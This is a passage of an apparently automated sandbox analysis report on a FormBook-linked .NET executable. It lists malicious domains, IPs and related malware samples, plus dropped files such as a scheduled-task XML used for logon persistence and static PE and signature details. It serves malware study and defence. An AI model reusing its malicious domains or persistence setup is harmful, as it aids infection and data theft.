                                                                • www.losmason.shop/uktz/
                                                                http://www.toolfriendonline.comGet hashmaliciousUnknownBrowse
                                                                • www.toolfriendonline.com/
                                                                http://nigoovip.comGet hashmaliciousUnknownBrowse
                                                                • nigoovip.com/

                                                                Domains

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                www.losmason.shopDocuments.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                • 104.18.73.116
                                                                santi.exeGet hashmaliciousFormBookBrowse
                                                                • 104.18.73.116
                                                                www.carpentry.clubDocuments.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                • 52.60.87.163
                                                                www.zrinorem-srumimit.sbsDocuments.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                • 172.67.222.69
                                                                www.6822662.xyzDocuments.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                • 103.249.106.91
                                                                www.lingdianyun29.xyzDocuments.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                • 121.43.155.35

                                                                ASNs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                CLOUDFLARENETUSLenticels.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                • 172.67.177.134
                                                                http://74.50.69.234/Get hashmaliciousUnknownBrowse
                                                                • 104.17.25.14
                                                                proforma invoice.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 104.26.13.205
                                                                UBS20240190101.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                • 172.67.177.134
                                                                Request for Quotation New collaboration.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                • 172.67.177.134
                                                                REQUEST FOR QUOATION AND PRICES 01306-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                • 104.21.67.152
                                                                http://74.50.69.234/Get hashmaliciousUnknownBrowse
                                                                • 104.18.95.41
                                                                file.exeGet hashmaliciousAmadey, Credential Flusher, DarkVision Rat, LummaC Stealer, StealcBrowse
                                                                • 104.21.16.9
                                                                http://metrics.gocloudmaps.comGet hashmaliciousUnknownBrowse
                                                                • 172.67.137.184
                                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                                • 172.67.165.166
                                                                ACPCAjew.mips.elfGet hashmaliciousUnknownBrowse
                                                                • 162.52.78.93
                                                                home.ppc.elfGet hashmaliciousMiraiBrowse
                                                                • 162.54.91.8
                                                                i686.elfGet hashmaliciousUnknownBrowse
                                                                • 162.54.34.238
                                                                main_mpsl.elfGet hashmaliciousMiraiBrowse
                                                                • 162.65.245.139
                                                                sora.sh4.elfGet hashmaliciousMiraiBrowse
                                                                • 162.55.63.205
                                                                teste.x86_64.elfGet hashmaliciousGafgyt, Mirai, Moobot, OkiruBrowse
                                                                • 162.128.62.120
                                                                m68k.elfGet hashmaliciousMiraiBrowse
                                                                • 162.137.25.111
                                                                teste.arm.elfGet hashmaliciousGafgyt, Mirai, Moobot, OkiruBrowse
                                                                • 162.32.169.38
                                                                New Order.exeGet hashmaliciousFormBookBrowse
                                                                • 162.0.213.94
                                                                yMvZXcwN2OdoP6x.exeGet hashmaliciousDarkCloudBrowse
                                                                • 162.55.60.2
                                                                CLOUDFLARENETUSLenticels.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                • 172.67.177.134
                                                                http://74.50.69.234/Get hashmaliciousUnknownBrowse
                                                                • 104.17.25.14
                                                                proforma invoice.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 104.26.13.205
                                                                UBS20240190101.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                • 172.67.177.134
                                                                Request for Quotation New collaboration.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                • 172.67.177.134
                                                                REQUEST FOR QUOATION AND PRICES 01306-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                • 104.21.67.152
                                                                http://74.50.69.234/Get hashmaliciousUnknownBrowse
                                                                • 104.18.95.41
                                                                file.exeGet hashmaliciousAmadey, Credential Flusher, DarkVision Rat, LummaC Stealer, StealcBrowse
                                                                • 104.21.16.9
                                                                http://metrics.gocloudmaps.comGet hashmaliciousUnknownBrowse
                                                                • 172.67.137.184
                                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                                • 172.67.165.166
                                                                CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdjew.arm6.elfGet hashmaliciousUnknownBrowse
                                                                • 139.243.57.190
                                                                jew.mips.elfGet hashmaliciousUnknownBrowse
                                                                • 139.252.155.161
                                                                jew.mpsl.elfGet hashmaliciousUnknownBrowse
                                                                • 47.114.175.49
                                                                YDArk_v1.0.1.11_Sign.exeGet hashmaliciousUnknownBrowse
                                                                • 47.102.143.195
                                                                sora.m68k.elfGet hashmaliciousMiraiBrowse
                                                                • 8.182.192.18
                                                                sora.ppc.elfGet hashmaliciousMiraiBrowse
                                                                • 47.116.232.127
                                                                meerkat.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                • 121.196.212.217
                                                                meerkat.arm5.elfGet hashmaliciousMiraiBrowse
                                                                • 8.181.190.236
                                                                meerkat.x86.elfGet hashmaliciousMiraiBrowse
                                                                • 123.56.214.177
                                                                mips.elfGet hashmaliciousUnknownBrowse
                                                                • 47.100.138.10

                                                                JA3 Fingerprints

                                                                No context

                                                                Dropped Files

                                                                No context

                                                                Created / dropped Files

                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):2232
                                                                Entropy (8bit):5.374957388473389
                                                                Encrypted:false
                                                                SSDEEP:48:BWSeR4y4RQmFoULn+gZ9tK8NPZHUxL7u1iMugeC/ZPUyus:BLXyIFKEZZ2KRHWLOug8s
                                                                MD5:5B61A650DDBD19386833671BFEAA7D03
                                                                SHA1:16119835ED19E0EEEA72E4BCF0338643217AF665
                                                                SHA-256:49339B2581277558BCF1D8CECBB0ED2FE6037F014F7B68568C6CAAA259724A8B
                                                                SHA-512:624FCFC5418F1D5A579E9101DAF6E8698970EC5679843AEA44C930984186291C5109D900574798110B3063D41536BCB465820F391E50F4CA8EE58FA3A715B908
                                                                Malicious:false
                                                                Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0.................Vn.F..kLsw..........System..4...............<."..Ke@...j..........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.<...............i..VdqF...|...........System.Configuration4..................~..2K..}...0........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                C:\Users\user\AppData\Local\Temp\H846yjBj

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\systray.exe
                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                Category:dropped
                                                                Size (bytes):196608
                                                                Entropy (8bit):1.1220068301579391
                                                                Encrypted:false
                                                                SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8JoudpfjOLl:aq+n0E9ELyKOMq+8qu3SJ
                                                                MD5:87EE0BBB38B11E14090EF60A7D56C8B1
                                                                SHA1:37966F94007814B687989937B4A299FA816581ED
                                                                SHA-256:22CD1C8F26B721A19A1E9108D16AB419ABAD17D34ACDA62CAE3004014D88437E
                                                                SHA-512:37572D4B5A336BC8220B9CF64F8F2D6041C68A449C582221C5C62A3BA1D8D4CA5C241C9383038EBF3D2787CF4AB9F7370E1A3C4AC7D6EC0A942FC41CD7917266
                                                                Malicious:false
                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d4fi0a0i.cdr.ps1

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ettwlgyr.ib2.psm1

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hq0na3m5.hkz.psm1

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jon2ghvs.qdg.ps1

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kvgfvmtv.ona.psm1

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ottpobvw.mam.ps1

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_raly3piu.la4.ps1

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ye4jbmvh.h2u.psm1

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\tmp1B5C.tmp

                                                                Download File
                                                                Process:C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe
                                                                File Type:XML 1.0 document, ASCII text
                                                                Category:dropped
                                                                Size (bytes):1578
                                                                Entropy (8bit):5.1055260406330465
                                                                Encrypted:false
                                                                SSDEEP:24:2di4+S2qh51Ny1miUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtq/xvn:cge5QYrFdOFzOzN33ODOiDdKrsuTq5v
                                                                MD5:81A0D8EDF104CBFC37860BCDDFEBA5AA
                                                                SHA1:B667A2AE1E97FF099D56CC95DC7CB409354FAD1C
                                                                SHA-256:BF989598818385FCB2AF31DCF932BF905358F1704B6C29C61301A2DA42863D0F
                                                                SHA-512:807867FB8BED150BDD43876AD40511979BBD1E148AE90B3A53BD813170690A82879A735EBE7D738B229CA9083D6A343E162FA919250666B83DD56AF042ED0C57
                                                                Malicious:true
                                                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                                C:\Users\user\AppData\Local\Temp\tmp4FBA.tmp

                                                                Download File
                                                                Process:C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe
                                                                File Type:XML 1.0 document, ASCII text
                                                                Category:dropped
                                                                Size (bytes):1578
                                                                Entropy (8bit):5.1055260406330465
                                                                Encrypted:false
                                                                SSDEEP:24:2di4+S2qh51Ny1miUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtq/xvn:cge5QYrFdOFzOzN33ODOiDdKrsuTq5v
                                                                MD5:81A0D8EDF104CBFC37860BCDDFEBA5AA
                                                                SHA1:B667A2AE1E97FF099D56CC95DC7CB409354FAD1C
                                                                SHA-256:BF989598818385FCB2AF31DCF932BF905358F1704B6C29C61301A2DA42863D0F
                                                                SHA-512:807867FB8BED150BDD43876AD40511979BBD1E148AE90B3A53BD813170690A82879A735EBE7D738B229CA9083D6A343E162FA919250666B83DD56AF042ED0C57
                                                                Malicious:false
                                                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                                C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe

                                                                Download File
                                                                Process:C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):842760
                                                                Entropy (8bit):7.737339380759165
                                                                Encrypted:false
                                                                SSDEEP:24576:Lx/DmnP3X/QErFdcdfeTN+g5IFCohQgSfy:9m3hr3cQTgg5IFJuu
                                                                MD5:B5554D36A6FCA18D2BBA3D41D4070539
                                                                SHA1:9CA275CF18F4796B97748DDB7E1525B997206293
                                                                SHA-256:2A9F7757A2446C5DCAE00827C59C685AE20F44F182A169E9C74304B04AED9D60
                                                                SHA-512:3A31020228F7049F4EAB4147A53DB8BFEC39E049AB23C49928292800F356F9A2E583ECA616A7BC4BC346C3DE207C7334DC68A7D302BF1AEE990312BFAD0E1260
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 63%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Qg..............0.............>.... ........@.. ....................................@....................................W........................6........................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H...................9...................................................j....T..^?.a. .{....BS&..!.[J.Z..>o.<7.Su..#..C.y8...'.D...Llx.%..Vu....o_..bVA....}..J)@....6.....C.?...3=.].1.Z.....I..a(N.!.k.Ua..........%..&../.e..5......n......b-.zv.7x[.....8 %~......5b.P.ze......@......1.[RQW...%.8$lW..v%4Q.M....g.*....H...........[.l..yR...3]..l5.Z.S...{p....)..=..}..f.....Xf...B.Z..O.!..Y...^,...a..1(H.b..2....L.z..{........b..1p^ ..B.]T..\...9.N.p...Px.G..

                                                                C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe:Zone.Identifier

                                                                Download File
                                                                Process:C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):26
                                                                Entropy (8bit):3.95006375643621
                                                                Encrypted:false
                                                                SSDEEP:3:ggPYV:rPYV
                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                Malicious:true
                                                                Preview:[ZoneTransfer]....ZoneId=0

                                                                Static File Info

                                                                General

                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Entropy (8bit):7.737339380759165
                                                                TrID:
                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                                                • Win32 Executable (generic) a (10002005/4) 49.93%
                                                                • Windows Screen Saver (13104/52) 0.07%
                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                File name:MN1qo2qaJmEvXDP.exe
                                                                File size:842'760 bytes
                                                                MD5:b5554d36a6fca18d2bba3d41d4070539
                                                                SHA1:9ca275cf18f4796b97748ddb7e1525b997206293
                                                                SHA256:2a9f7757a2446c5dcae00827c59c685ae20f44f182a169e9c74304b04aed9d60
                                                                SHA512:3a31020228f7049f4eab4147a53db8bfec39e049ab23c49928292800f356f9a2e583eca616a7bc4bc346c3de207c7334dc68a7d302bf1aee990312bfad0e1260
                                                                SSDEEP:24576:Lx/DmnP3X/QErFdcdfeTN+g5IFCohQgSfy:9m3hr3cQTgg5IFJuu
                                                                TLSH:D905E19C7640B44FC943CD358EA4FD74EA246DAA9707C20365D72EEFB91E95B8E040E2
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Qg..............0.............>.... ........@.. ....................................@................................

                                                                File Icon

                                                                Icon Hash:0697f0b9b0b1d827

                                                                Static PE Info

                                                                General

                                                                Entrypoint:0x4ca53e
                                                                Entrypoint Section:.text
                                                                Digitally signed:true
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                Time Stamp:0x67510DEE [Thu Dec 5 02:20:30 2024 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                Authenticode Signature

                                                                Signature Valid:false
                                                                Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                                Signature Validation Error:The digital signature of the object did not verify
                                                                Error Number:-2146869232
                                                                Not Before, Not After
                                                                • 12/11/2018 19:00:00 08/11/2021 18:59:59
                                                                Subject Chain
                                                                • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                                                Version:3
                                                                Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                                                Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                                                Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                                                Serial:7C1118CBBADC95DA3752C46E47A27438

                                                                Entrypoint Preview

                                                                Instruction
                                                                jmp dword ptr [00402000h]
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al

                                                                Data Directories

                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xca4e40x57.text
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xcc0000x1bf0.rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0xca6000x3608
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xce0000xc.reloc
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
